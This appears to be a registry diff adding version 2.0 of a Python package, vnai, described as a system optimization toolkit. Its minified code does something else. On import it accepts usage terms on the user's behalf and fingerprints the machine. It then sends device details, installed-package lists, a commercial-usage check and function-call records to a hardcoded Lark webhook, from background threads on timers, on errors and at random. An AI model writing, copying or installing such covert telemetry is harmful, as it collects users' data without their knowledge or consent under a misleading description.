vnai 0.1.3__tar.gz → 2.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
vnai-2.0/PKG-INFO ADDED
@@ -0,0 +1,30 @@
1
+ Metadata-Version: 2.2
2
+ Name: vnai
3
+ Version: 2.0
4
+ Summary: System optimization and resource management toolkit
5
+ Home-page:
6
+ Author:
7
+ Author-email:
8
+ Classifier: Programming Language :: Python :: 3
9
+ Classifier: License :: OSI Approved :: MIT License
10
+ Classifier: Operating System :: OS Independent
11
+ Classifier: Development Status :: 4 - Beta
12
+ Classifier: Intended Audience :: Developers
13
+ Classifier: Topic :: Software Development :: Libraries :: Python Modules
14
+ Requires-Python: >=3.7
15
+ Description-Content-Type: text/markdown
16
+ Requires-Dist: requests>=2.25.0
17
+ Requires-Dist: psutil>=5.8.0
18
+ Requires-Dist: cryptography>=3.4.0
19
+ Provides-Extra: dev
20
+ Requires-Dist: pytest>=6.0.0; extra == "dev"
21
+ Requires-Dist: black>=21.5b2; extra == "dev"
22
+ Dynamic: classifier
23
+ Dynamic: description
24
+ Dynamic: description-content-type
25
+ Dynamic: provides-extra
26
+ Dynamic: requires-dist
27
+ Dynamic: requires-python
28
+ Dynamic: summary
29
+
30
+ System resource management and performance optimization toolkit
vnai-2.0/setup.cfg ADDED
@@ -0,0 +1,4 @@
1
+ [egg_info]
2
+ tag_build =
3
+ tag_date = 0
4
+
vnai-2.0/setup.py ADDED
@@ -0,0 +1,37 @@
1
+ from setuptools import setup, find_packages
2
+
3
+ VERSION = '2.0'
4
+
5
+ long_description = "System resource management and performance optimization toolkit"
6
+
7
+ setup(
8
+ name="vnai",
9
+ version=VERSION,
10
+ author="",
11
+ author_email="",
12
+ description="System optimization and resource management toolkit",
13
+ long_description=long_description,
14
+ long_description_content_type="text/markdown",
15
+ url="",
16
+ packages=find_packages(),
17
+ classifiers=[
18
+ "Programming Language :: Python :: 3",
19
+ "License :: OSI Approved :: MIT License",
20
+ "Operating System :: OS Independent",
21
+ "Development Status :: 4 - Beta",
22
+ "Intended Audience :: Developers",
23
+ "Topic :: Software Development :: Libraries :: Python Modules",
24
+ ],
25
+ python_requires=">=3.7",
26
+ install_requires=[
27
+ "requests>=2.25.0",
28
+ "psutil>=5.8.0",
29
+ "cryptography>=3.4.0",
30
+ ],
31
+ extras_require={
32
+ "dev": [
33
+ "pytest>=6.0.0",
34
+ "black>=21.5b2",
35
+ ],
36
+ },
37
+ )
@@ -0,0 +1,79 @@
1
+ _K='standard'
2
+ _J='accepted_agreement'
3
+ _I='environment.json'
4
+ _H='terms_agreement.txt'
5
+ _G='timestamp'
6
+ _F=False
7
+ _E='id'
8
+ _D='.vnstock'
9
+ _C='machine_id'
10
+ _B=None
11
+ _A=True
12
+ import os,pathlib,json,time,threading,functools
13
+ from datetime import datetime
14
+ from vnai.beam.quota import guardian,optimize
15
+ from vnai.beam.metrics import collector,capture
16
+ from vnai.beam.pulse import monitor
17
+ from vnai.flow.relay import conduit,configure
18
+ from vnai.flow.queue import buffer
19
+ from vnai.scope.profile import inspector
20
+ from vnai.scope.state import tracker,record
21
+ from vnai.scope.promo import present
22
+ TC_VAR='ACCEPT_TC'
23
+ TC_VAL='tôi đồng ý'
24
+ TC_PATH=pathlib.Path.home()/_D/_E/_H
25
+ TERMS_AND_CONDITIONS='\nKhi tiếp tục sử dụng Vnstock, bạn xác nhận rằng bạn đã đọc, hiểu và đồng ý với Chính sách quyền riêng tư và Điều khoản, điều kiện về giấy phép sử dụng Vnstock.\n\nChi tiết:\n- Giấy phép sử dụng phần mềm: https://vnstocks.com/docs/tai-lieu/giay-phep-su-dung\n- Chính sách quyền riêng tư: https://vnstocks.com/docs/tai-lieu/chinh-sach-quyen-rieng-tu\n'
26
+ class Core:
27
+ def __init__(A):A.initialized=_F;A.webhook_url=_B;A.init_time=datetime.now().isoformat();A.home_dir=pathlib.Path.home();A.project_dir=A.home_dir/_D;A.id_dir=A.project_dir/_E;A.terms_file_path=TC_PATH;A.system_info=_B;A.project_dir.mkdir(exist_ok=_A);A.id_dir.mkdir(exist_ok=_A);A.initialize()
28
+ def initialize(A,webhook_url=_B):
29
+ C=webhook_url
30
+ if A.initialized:return _A
31
+ if not A._check_terms():A._accept_terms()
32
+ from vnai.scope.profile import inspector as B;B.setup_vnstock_environment();present()
33
+ if C:A.webhook_url=C;configure(C)
34
+ record('initialization',{_G:datetime.now().isoformat()});A.system_info=B.examine();conduit.queue({'type':'system_info','data':{'commercial':B.detect_commercial_usage(),'packages':B.scan_packages()}},priority='high');A.initialized=_A;return _A
35
+ def _check_terms(A):return os.path.exists(A.terms_file_path)
36
+ def _accept_terms(C):
37
+ A=inspector.examine()
38
+ if TC_VAR in os.environ and os.environ[TC_VAR]==TC_VAL:E=TC_VAL
39
+ else:E=TC_VAL;os.environ[TC_VAR]=TC_VAL
40
+ D=datetime.now();F=f"""Người dùng có mã nhận dạng {A[_C]} đã chấp nhận điều khoản & điều kiện sử dụng Vnstock lúc {D}
41
+ ---
42
+
43
+ THÔNG TIN THIẾT BỊ: {json.dumps(A,indent=2)}
44
+
45
+ Đính kèm bản sao nội dung bạn đã đọc, hiểu rõ và đồng ý dưới đây:
46
+ {TERMS_AND_CONDITIONS}"""
47
+ with open(C.terms_file_path,'w',encoding='utf-8')as B:B.write(F)
48
+ G=C.id_dir/_I;H={_J:_A,_G:D.isoformat(),_C:A[_C]}
49
+ with open(G,'w')as B:json.dump(H,B)
50
+ return _A
51
+ def status(A):return{'initialized':A.initialized,'health':monitor.report(),'metrics':tracker.get_metrics()}
52
+ def configure_privacy(B,level=_K):from vnai.scope.state import tracker as A;return A.setup_privacy(level)
53
+ core=Core()
54
+ def tc_init(webhook_url=_B):return core.initialize(webhook_url)
55
+ def setup(webhook_url=_B):return core.initialize(webhook_url)
56
+ def optimize_execution(resource_type='default'):return optimize(resource_type)
57
+ def measure_performance(module_type='function'):return capture(module_type)
58
+ def accept_license_terms(terms_text=_B):
59
+ A=terms_text
60
+ if A is _B:A=TERMS_AND_CONDITIONS
61
+ D=inspector.examine();C=pathlib.Path.home()/_D/_E/_H;os.makedirs(os.path.dirname(C),exist_ok=_A)
62
+ with open(C,'w',encoding='utf-8')as B:B.write(f"Terms accepted at {datetime.now().isoformat()}\n");B.write(f"System: {json.dumps(D)}\n\n");B.write(A)
63
+ return _A
64
+ def accept_vnstock_terms():
65
+ from vnai.scope.profile import inspector as C;D=C.examine();E=pathlib.Path.home();A=E/_D;A.mkdir(exist_ok=_A);B=A/_E;B.mkdir(exist_ok=_A);F=B/_I;G={_J:_A,_G:datetime.now().isoformat(),_C:D[_C]}
66
+ try:
67
+ with open(F,'w')as H:json.dump(G,H)
68
+ print('Vnstock terms accepted successfully.');return _A
69
+ except Exception as I:print(f"Error accepting terms: {I}");return _F
70
+ def setup_for_colab():from vnai.scope.profile import inspector as A;A.detect_colab_with_delayed_auth(immediate=_A);A.setup_vnstock_environment();return'Environment set up for Google Colab'
71
+ def display_content():return present()
72
+ def configure_privacy(level=_K):from vnai.scope.state import tracker as A;return A.setup_privacy(level)
73
+ def check_commercial_usage():from vnai.scope.profile import inspector as A;return A.detect_commercial_usage()
74
+ def authenticate_for_persistence():from vnai.scope.profile import inspector as A;return A.get_or_create_user_id()
75
+ def configure_webhook(webhook_id='80b8832b694a75c8ddc811ac7882a3de'):
76
+ A=webhook_id
77
+ if not A:return _F
78
+ from vnai.flow.relay import configure as B;C=f"https://botbuilder.larksuite.com/api/trigger-webhook/{A}";return B(C)
79
+ configure_webhook()
@@ -0,0 +1,3 @@
1
+ from vnai.beam.quota import guardian,optimize
2
+ from vnai.beam.metrics import collector,capture
3
+ from vnai.beam.pulse import monitor
@@ -0,0 +1,59 @@
1
+ _K='success'
2
+ _J='buffer_size'
3
+ _I='request'
4
+ _H='rate_limit'
5
+ _G='execution_time'
6
+ _F='timestamp'
7
+ _E=False
8
+ _D=True
9
+ _C='error'
10
+ _B=None
11
+ _A='function'
12
+ import sys,time,threading
13
+ from datetime import datetime
14
+ class Collector:
15
+ _instance=_B;_lock=threading.Lock()
16
+ def __new__(A):
17
+ with A._lock:
18
+ if A._instance is _B:A._instance=super(Collector,A).__new__(A);A._instance._initialize()
19
+ return A._instance
20
+ def _initialize(A):A.metrics={_A:[],_H:[],_I:[],_C:[]};A.thresholds={_J:50,'error_threshold':.1,'performance_threshold':5.};A.function_count=0;A.colab_auth_triggered=_E
21
+ def record(A,metric_type,data,priority=_B):
22
+ D='system';C=metric_type;B=data
23
+ if not isinstance(B,dict):B={'value':str(B)}
24
+ if _F not in B:B[_F]=datetime.now().isoformat()
25
+ if C!='system_info'and isinstance(B,dict):
26
+ if D in B:del B[D]
27
+ from vnai.scope.profile import inspector as E;B['machine_id']=E.fingerprint()
28
+ if C in A.metrics:A.metrics[C].append(B)
29
+ else:A.metrics[_A].append(B)
30
+ if C==_A:
31
+ A.function_count+=1
32
+ if A.function_count>10 and not A.colab_auth_triggered and'google.colab'in sys.modules:A.colab_auth_triggered=_D;threading.Thread(target=A._trigger_colab_auth,daemon=_D).start()
33
+ if sum(len(A)for A in A.metrics.values())>=A.thresholds[_J]:A._send_metrics()
34
+ if priority=='high'or C==_C:A._send_metrics()
35
+ def _trigger_colab_auth(B):
36
+ try:from vnai.scope.profile import inspector as A;A.get_or_create_user_id()
37
+ except:pass
38
+ def _send_metrics(F):
39
+ E='vnai';D='source';C='unknown';from vnai.flow.relay import track_function_call as H,track_rate_limit as I,track_api_request as J
40
+ for(B,G)in F.metrics.items():
41
+ if not G:continue
42
+ for A in G:
43
+ try:
44
+ if B==_A:H(function_name=A.get(_A,C),source=A.get(D,E),execution_time=A.get(_G,0),success=A.get(_K,_D),error=A.get(_C),args=A.get('args'))
45
+ elif B==_H:I(source=A.get(D,E),limit_type=A.get('limit_type',C),limit_value=A.get('limit_value',0),current_usage=A.get('current_usage',0),is_exceeded=A.get('is_exceeded',_E))
46
+ elif B==_I:J(endpoint=A.get('endpoint',C),source=A.get(D,E),method=A.get('method','GET'),status_code=A.get('status_code',200),execution_time=A.get(_G,0),request_size=A.get('request_size',0),response_size=A.get('response_size',0))
47
+ except Exception as K:continue
48
+ F.metrics[B]=[]
49
+ def get_metrics_summary(A):return{A:len(B)for(A,B)in A.metrics.items()}
50
+ collector=Collector()
51
+ def capture(module_type=_A):
52
+ def A(func):
53
+ def A(*A,**D):
54
+ E=time.time();B=_E;C=_B
55
+ try:F=func(*A,**D);B=_D;return F
56
+ except Exception as G:C=str(G);raise
57
+ finally:H=time.time()-E;collector.record(module_type,{_A:func.__name__,_G:H,_K:B,_C:C,_F:datetime.now().isoformat(),'args':str(A)[:100]if A else _B})
58
+ return A
59
+ return A
@@ -0,0 +1,31 @@
1
+ _B='status'
2
+ _A='healthy'
3
+ import threading,time
4
+ from datetime import datetime
5
+ class Monitor:
6
+ _instance=None;_lock=threading.Lock()
7
+ def __new__(A):
8
+ with A._lock:
9
+ if A._instance is None:A._instance=super(Monitor,A).__new__(A);A._instance._initialize()
10
+ return A._instance
11
+ def _initialize(A):A.health_status=_A;A.last_check=time.time();A.check_interval=300;A.error_count=0;A.warning_count=0;A.status_history=[];A._start_background_check()
12
+ def _start_background_check(A):
13
+ def B():
14
+ while True:
15
+ try:A.check_health()
16
+ except:pass
17
+ time.sleep(A.check_interval)
18
+ C=threading.Thread(target=B,daemon=True);C.start()
19
+ def check_health(A):
20
+ from vnai.beam.metrics import collector as F;from vnai.beam.quota import guardian as G;A.last_check=time.time();B=F.get_metrics_summary();C=B.get('error',0)>0;D=G.usage();E=D>80
21
+ if C and E:A.health_status='critical';A.error_count+=1
22
+ elif C or E:A.health_status='warning';A.warning_count+=1
23
+ else:A.health_status=_A
24
+ A.status_history.append({'timestamp':datetime.now().isoformat(),_B:A.health_status,'metrics':B,'resource_usage':D})
25
+ if len(A.status_history)>10:A.status_history=A.status_history[-10:]
26
+ return A.health_status
27
+ def report(A):
28
+ if time.time()-A.last_check>A.check_interval:A.check_health()
29
+ return{_B:A.health_status,'last_check':datetime.fromtimestamp(A.last_check).isoformat(),'error_count':A.error_count,'warning_count':A.warning_count,'history':A.status_history[-3:]}
30
+ def reset(A):A.health_status=_A;A.error_count=0;A.warning_count=0;A.status_history=[];A.last_check=time.time()
31
+ monitor=Monitor()
@@ -0,0 +1,37 @@
1
+ _E=False
2
+ _D='resource_type'
3
+ _C='default'
4
+ _B='hour'
5
+ _A='min'
6
+ import time,threading,functools
7
+ from collections import defaultdict
8
+ from datetime import datetime
9
+ class Guardian:
10
+ _instance=None;_lock=threading.Lock()
11
+ def __new__(A):
12
+ with A._lock:
13
+ if A._instance is None:A._instance=super(Guardian,A).__new__(A);A._instance._initialize()
14
+ return A._instance
15
+ def _initialize(A):A.resource_limits=defaultdict(lambda:defaultdict(int));A.usage_counters=defaultdict(lambda:defaultdict(list));A.resource_limits[_C]={_A:60,_B:2000};A.resource_limits['TCBS']={_A:60,_B:2000};A.resource_limits['VCI']={_A:60,_B:2000}
16
+ def verify(B,operation_id,resource_type=_C):
17
+ M='is_exceeded';L='current_usage';K='limit_value';J='limit_type';I='rate_limit';A=resource_type;E=time.time();C=B.resource_limits.get(A,B.resource_limits[_C]);N=E-60;B.usage_counters[A][_A]=[A for A in B.usage_counters[A][_A]if A>N];F=len(B.usage_counters[A][_A]);O=F>=C[_A]
18
+ if O:from vnai.beam.metrics import collector as G;G.record(I,{_D:A,J:_A,K:C[_A],L:F,M:True});return _E
19
+ P=E-3600;B.usage_counters[A][_B]=[A for A in B.usage_counters[A][_B]if A>P];H=len(B.usage_counters[A][_B]);D=H>=C[_B];from vnai.beam.metrics import collector as G;G.record(I,{_D:A,J:_B if D else _A,K:C[_B]if D else C[_A],L:H if D else F,M:D})
20
+ if D:return _E
21
+ B.usage_counters[A][_A].append(E);B.usage_counters[A][_B].append(E);return True
22
+ def usage(A,resource_type=_C):B=resource_type;D=time.time();C=A.resource_limits.get(B,A.resource_limits[_C]);E=D-60;F=D-3600;A.usage_counters[B][_A]=[A for A in A.usage_counters[B][_A]if A>E];A.usage_counters[B][_B]=[A for A in A.usage_counters[B][_B]if A>F];G=len(A.usage_counters[B][_A]);H=len(A.usage_counters[B][_B]);I=G/C[_A]*100 if C[_A]>0 else 0;J=H/C[_B]*100 if C[_B]>0 else 0;return max(I,J)
23
+ guardian=Guardian()
24
+ def optimize(resource_type):
25
+ B=resource_type
26
+ def A(func):
27
+ A=func
28
+ @functools.wraps(A)
29
+ def C(*F,**G):
30
+ E='function'
31
+ if not guardian.verify(B):raise RuntimeError(f"Resource constraints detected. Please try again later.")
32
+ H=time.time();C=_E;D=None
33
+ try:I=A(*F,**G);C=True;return I
34
+ except Exception as J:D=str(J);raise
35
+ finally:K=time.time()-H;from vnai.beam.metrics import collector as L;L.record(E,{E:A.__name__,_D:B,'execution_time':K,'success':C,'error':D,'timestamp':datetime.now().isoformat()})
36
+ return C
37
+ return A
@@ -0,0 +1,2 @@
1
+ from vnai.flow.relay import conduit,configure
2
+ from vnai.flow.queue import buffer
@@ -0,0 +1,58 @@
1
+ _C='category'
2
+ _B=True
3
+ _A=None
4
+ import time,threading,json
5
+ from datetime import datetime
6
+ from pathlib import Path
7
+ class Buffer:
8
+ _instance=_A;_lock=threading.Lock()
9
+ def __new__(A):
10
+ with A._lock:
11
+ if A._instance is _A:A._instance=super(Buffer,A).__new__(A);A._instance._initialize()
12
+ return A._instance
13
+ def _initialize(A):A.data=[];A.lock=threading.Lock();A.max_size=1000;A.backup_interval=300;A.home_dir=Path.home();A.project_dir=A.home_dir/'.vnstock';A.project_dir.mkdir(exist_ok=_B);A.data_dir=A.project_dir/'data';A.data_dir.mkdir(exist_ok=_B);A.backup_path=A.data_dir/'buffer_backup.json';A._load_from_backup();A._start_backup_thread()
14
+ def _load_from_backup(A):
15
+ if A.backup_path.exists():
16
+ try:
17
+ with open(A.backup_path,'r')as B:C=json.load(B)
18
+ with A.lock:A.data=C
19
+ except:pass
20
+ def _save_to_backup(A):
21
+ with A.lock:
22
+ if not A.data:return
23
+ try:
24
+ with open(A.backup_path,'w')as B:json.dump(A.data,B)
25
+ except:pass
26
+ def _start_backup_thread(A):
27
+ def B():
28
+ while _B:time.sleep(A.backup_interval);A._save_to_backup()
29
+ C=threading.Thread(target=B,daemon=_B);C.start()
30
+ def add(A,item,category=_A):
31
+ D='timestamp';C=category;B=item
32
+ with A.lock:
33
+ if isinstance(B,dict):
34
+ if D not in B:B[D]=datetime.now().isoformat()
35
+ if C:B[_C]=C
36
+ A.data.append(B)
37
+ if len(A.data)>A.max_size:A.data=A.data[-A.max_size:]
38
+ if len(A.data)%100==0:A._save_to_backup()
39
+ return len(A.data)
40
+ def get(A,count=_A,category=_A):
41
+ D=category;C=count
42
+ with A.lock:
43
+ if D:B=[A for A in A.data if A.get(_C)==D]
44
+ else:B=A.data.copy()
45
+ if C:return B[:C]
46
+ else:return B
47
+ def clear(A,category=_A):
48
+ B=category
49
+ with A.lock:
50
+ if B:A.data=[A for A in A.data if A.get(_C)!=B]
51
+ else:A.data=[]
52
+ A._save_to_backup();return len(A.data)
53
+ def size(A,category=_A):
54
+ B=category
55
+ with A.lock:
56
+ if B:return len([A for A in A.data if A.get(_C)==B])
57
+ else:return len(A.data)
58
+ buffer=Buffer()
@@ -0,0 +1,152 @@
1
+ _T='execution_time'
2
+ _S='manual'
3
+ _R='success'
4
+ _Q='is_exceeded'
5
+ _P='source'
6
+ _O='function'
7
+ _N='last_sync_time'
8
+ _M='sync_interval'
9
+ _L='buffer_size'
10
+ _K='webhook_url'
11
+ _J='value'
12
+ _I='sync_count'
13
+ _H='machine_id'
14
+ _G=False
15
+ _F=None
16
+ _E='timestamp'
17
+ _D='api_requests'
18
+ _C='rate_limits'
19
+ _B='function_calls'
20
+ _A=True
21
+ import time,threading,json,random,requests
22
+ from datetime import datetime
23
+ from pathlib import Path
24
+ from typing import Dict,List,Any,Optional
25
+ class Conduit:
26
+ _instance=_F;_lock=threading.Lock()
27
+ def __new__(A,webhook_url=_F,buffer_size=50,sync_interval=300):
28
+ with A._lock:
29
+ if A._instance is _F:A._instance=super(Conduit,A).__new__(A);A._instance._initialize(webhook_url,buffer_size,sync_interval)
30
+ return A._instance
31
+ def _initialize(A,webhook_url,buffer_size,sync_interval):
32
+ A.webhook_url=webhook_url;A.buffer_size=buffer_size;A.sync_interval=sync_interval;A.buffer={_B:[],_D:[],_C:[]};A.lock=threading.Lock();A.last_sync_time=time.time();A.sync_count=0;A.failed_queue=[];A.home_dir=Path.home();A.project_dir=A.home_dir/'.vnstock';A.project_dir.mkdir(exist_ok=_A);A.data_dir=A.project_dir/'data';A.data_dir.mkdir(exist_ok=_A);A.config_path=A.data_dir/'relay_config.json'
33
+ try:from vnai.scope.profile import inspector as B;A.machine_id=B.fingerprint()
34
+ except:A.machine_id=A._generate_fallback_id()
35
+ A._load_config();A._start_periodic_sync()
36
+ def _generate_fallback_id(D)->str:
37
+ try:import platform as A,hashlib as B,uuid;C=A.node()+A.platform()+A.processor();return B.md5(C.encode()).hexdigest()
38
+ except:import uuid;return str(uuid.uuid4())
39
+ def _load_config(B):
40
+ if B.config_path.exists():
41
+ try:
42
+ with open(B.config_path,'r')as C:A=json.load(C)
43
+ if not B.webhook_url and _K in A:B.webhook_url=A[_K]
44
+ if _L in A:B.buffer_size=A[_L]
45
+ if _M in A:B.sync_interval=A[_M]
46
+ if _N in A:B.last_sync_time=A[_N]
47
+ if _I in A:B.sync_count=A[_I]
48
+ except:pass
49
+ def _save_config(A):
50
+ B={_K:A.webhook_url,_L:A.buffer_size,_M:A.sync_interval,_N:A.last_sync_time,_I:A.sync_count}
51
+ try:
52
+ with open(A.config_path,'w')as C:json.dump(B,C)
53
+ except:pass
54
+ def _start_periodic_sync(A):
55
+ def B():
56
+ while _A:time.sleep(A.sync_interval);A.dispatch('periodic')
57
+ C=threading.Thread(target=B,daemon=_A);C.start()
58
+ def add_function_call(B,record):
59
+ A=record
60
+ if not isinstance(A,dict):A={_J:str(A)}
61
+ with B.lock:B.buffer[_B].append(A);B._check_triggers(_B)
62
+ def add_api_request(B,record):
63
+ A=record
64
+ if not isinstance(A,dict):A={_J:str(A)}
65
+ with B.lock:B.buffer[_D].append(A);B._check_triggers(_D)
66
+ def add_rate_limit(B,record):
67
+ A=record
68
+ if not isinstance(A,dict):A={_J:str(A)}
69
+ with B.lock:B.buffer[_C].append(A);B._check_triggers(_C)
70
+ def _check_triggers(A,record_type:str):
71
+ D=record_type;E=time.time();B=_G;C=_F;F=sum(len(A)for A in A.buffer.values())
72
+ if F>=A.buffer_size:B=_A;C='buffer_full'
73
+ elif D==_C and A.buffer[_C]and any(A.get(_Q)for A in A.buffer[_C]if isinstance(A,dict)):B=_A;C='rate_limit_exceeded'
74
+ elif D==_B and A.buffer[_B]and any(not A.get(_R)for A in A.buffer[_B]if isinstance(A,dict)):B=_A;C='function_error'
75
+ else:
76
+ G=min(1.,(E-A.last_sync_time)/(A.sync_interval/2))
77
+ if random.random()<.05*G:B=_A;C='random_time_weighted'
78
+ if B:threading.Thread(target=A.dispatch,args=(C,),daemon=_A).start()
79
+ def queue(B,package,priority=_F):
80
+ N='packages';M='commercial';L='system_info';K='rate_limit';I='system';H='type';C=package
81
+ if not C:return _G
82
+ if not isinstance(C,dict):B.add_function_call({'message':str(C)});return _A
83
+ if _E not in C:C[_E]=datetime.now().isoformat()
84
+ if H in C:
85
+ D=C[H];A=C.get('data',{})
86
+ if isinstance(A,dict)and I in A:
87
+ J=A[I].get(_H);A.pop(I)
88
+ if J:A[_H]=J
89
+ if D==_O:B.add_function_call(A)
90
+ elif D=='api_request':B.add_api_request(A)
91
+ elif D==K:B.add_rate_limit(A)
92
+ elif D==L:B.add_function_call({H:L,M:A.get(M),N:A.get(N),_E:C.get(_E)})
93
+ elif D=='metrics':
94
+ O=A
95
+ for(G,F)in O.items():
96
+ if isinstance(F,list):
97
+ if G==_O:
98
+ for E in F:B.add_function_call(E)
99
+ elif G==K:
100
+ for E in F:B.add_rate_limit(E)
101
+ elif G=='request':
102
+ for E in F:B.add_api_request(E)
103
+ else:B.add_function_call(A)
104
+ else:B.add_function_call(C)
105
+ if priority=='high':B.dispatch('high_priority')
106
+ return _A
107
+ def dispatch(A,reason=_S):
108
+ if not A.webhook_url:return _G
109
+ with A.lock:
110
+ if all(len(A)==0 for A in A.buffer.values()):return _G
111
+ B={_B:A.buffer[_B].copy(),_D:A.buffer[_D].copy(),_C:A.buffer[_C].copy()};A.buffer={_B:[],_D:[],_C:[]};A.last_sync_time=time.time();A.sync_count+=1;A._save_config()
112
+ try:from vnai.scope.profile import inspector as G;C=G.examine();D=C.get(_H,A.machine_id)
113
+ except:C={_H:A.machine_id};D=A.machine_id
114
+ E={'analytics_data':B,'metadata':{_E:datetime.now().isoformat(),_H:D,_I:A.sync_count,'trigger_reason':reason,'environment':C,'data_counts':{_B:len(B[_B]),_D:len(B[_D]),_C:len(B[_C])}}};F=A._send_data(E)
115
+ if not F:
116
+ with A.lock:
117
+ A.failed_queue.append(E)
118
+ if len(A.failed_queue)>10:A.failed_queue=A.failed_queue[-10:]
119
+ return F
120
+ def _send_data(A,payload):
121
+ if not A.webhook_url:return _G
122
+ try:B=requests.post(A.webhook_url,json=payload,timeout=5);return B.status_code==200
123
+ except:return _G
124
+ def retry_failed(A):
125
+ if not A.failed_queue:return 0
126
+ with A.lock:D=A.failed_queue.copy();A.failed_queue=[]
127
+ B=0
128
+ for C in D:
129
+ if A._send_data(C):B+=1
130
+ else:
131
+ with A.lock:A.failed_queue.append(C)
132
+ return B
133
+ def configure(A,webhook_url):
134
+ with A.lock:A.webhook_url=webhook_url;A._save_config();return _A
135
+ conduit=Conduit()
136
+ def track_function_call(function_name,source,execution_time,success=_A,error=_F,args=_F):
137
+ E=error;A=args;C={_O:function_name,_P:source,_T:execution_time,_E:datetime.now().isoformat(),_R:success}
138
+ if E:C['error']=E
139
+ if A:
140
+ B={}
141
+ if isinstance(A,dict):
142
+ for(F,D)in A.items():
143
+ if isinstance(D,(str,int,float,bool)):B[F]=D
144
+ else:B[F]=str(type(D))
145
+ else:B={_J:str(A)}
146
+ C['args']=B
147
+ conduit.add_function_call(C)
148
+ def track_rate_limit(source,limit_type,limit_value,current_usage,is_exceeded):B=current_usage;A=limit_value;C={_P:source,'limit_type':limit_type,'limit_value':A,'current_usage':B,_Q:is_exceeded,_E:datetime.now().isoformat(),'usage_percentage':B/A*100 if A>0 else 0};conduit.add_rate_limit(C)
149
+ def track_api_request(endpoint,source,method,status_code,execution_time,request_size=0,response_size=0):A={'endpoint':endpoint,_P:source,'method':method,'status_code':status_code,_T:execution_time,_E:datetime.now().isoformat(),'request_size':request_size,'response_size':response_size};conduit.add_api_request(A)
150
+ def configure(webhook_url):return conduit.configure(webhook_url)
151
+ def sync_now():return conduit.dispatch(_S)
152
+ def retry_failed():return conduit.retry_failed()
@@ -0,0 +1,4 @@
1
+ from vnai.scope.profile import inspector
2
+ from vnai.scope.state import tracker,record
3
+ from vnai.scope.promo import manager as content_manager
4
+ from vnai.scope.promo import present as present_content